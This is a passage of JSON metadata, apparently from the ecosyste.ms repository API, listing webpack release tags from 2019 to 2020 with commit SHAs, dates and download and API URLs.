55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl